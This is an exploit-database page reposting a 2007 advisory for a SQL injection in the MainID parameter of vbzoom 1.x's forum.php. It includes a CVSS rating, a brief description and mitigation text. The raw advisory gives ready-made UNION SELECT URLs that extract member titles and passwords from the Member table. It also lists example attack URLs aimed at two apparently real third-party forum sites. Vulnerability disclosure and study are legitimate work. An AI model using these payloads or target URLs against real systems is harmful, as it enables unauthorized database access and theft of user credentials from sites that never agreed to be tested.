vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerabilities

vendor:

vbzoom

by:

Cold z3ro

7.5

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: vbzoom

Affected Version From: vbzoom 1.x

Affected Version To: vbzoom 1.x

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerabilities

The vbzoom 1.x forum.php MainID parameter is vulnerable to remote SQL injection. An attacker can manipulate the MainID parameter to execute arbitrary SQL queries and retrieve sensitive information from the Member table. The vulnerability allows unauthorized access to user titles and passwords.

Mitigation:

The vendor should release a patch or update to sanitize user input and prevent SQL injection attacks. In the meantime, users should avoid using the affected application or ensure they are using the latest version with security fixes.

Source

Exploit-DB raw data:

--/ Long Life Palestine  --

     HHHHHH  HHHHHH HH      HHHHHH  HHHHHH HHHHHHHH  HHHH HH    HH HHHHHH
     HH   HH HH  HH HH      HHHHH  HH         HH      HH  HHH   HH HHHHH
     HH   HH HH  HH HH      HH     HH         HH      HH  HHHH  HH HH
     HHHHHH  HHHHHH HH      HHHHH   HHHHHH    HH      HH  HH HH HH HHHHHH
     HH      HH  HH HH      HH           HH   HH      HH  HH  HHHH HH
     HH      HH  HH HH      HHHHH        HH   HH      HH  HH   HHH HHHHH
     HH      HH  HH HHHHHHH HHHHHH  HHHHHH    HH     HHHH HH    HH HHHHHH

                 HH  HH HHHHHH HHHHHH HH   HH HHHHHH HHHHHH
                 HH  HH HH  HH HHHHHH HH  HH  HHHHH  HHH HHH
                 HH  HH HH  HH HH     HH HH   HH     HH  HH
                 HHHHHH HHHHHH HH     HHHH    HHHHHH HHHHH
                 HH  HH HH  HH HH     HH HH   HH     HH  HH
                 HH  HH HH  HH HHHHHH HH  HH  HHHHH  HH   HH
                 HH  HH HH  HH HHHHHH HH   HH HHHHHH HH    HH
--/ Long Life Palestine  --

vbzoom 1.x (forum.php MainID) Remote SQL Injection Vulnerabilities

Found By : Cold z3ro , Cold-z3ro@hotmail.com
Homepages : http://hackteach.org , http://h4ps.com

For user :
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*
Or
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,usertitle,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*

For Password : 
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*
Or
/forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*

Example :
http://1yemen.com/vb//forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13%20from%20Member%20where%20Memberid%20=1/*

http://www.vz.elagha.net//forum.php?MainID=-1%20union%20select%201,2,3,4,5,password,7,8,9,10,11,12,13,14%20from%20Member%20where%20Memberid%20=1/*

ÃžÃ£Ã¤Ã‡ ÃˆÃŠÃ›ÃÃ‘ Ã‘Ã‡ÃˆÃ˜ Ã£Ã¦ÃžÃšÃ¤Ã‡ Ã¡Ãœ
http://hackteach.org

-----------
Thx For : RomancyxHacker , Mogatil , Abo0oD , Mohandko , The Wolf Ksa , Root-Shell ,          Viper Hacker , By_3mry , All Friends

# www.hackteach.org

# milw0rm.com [2007-07-02]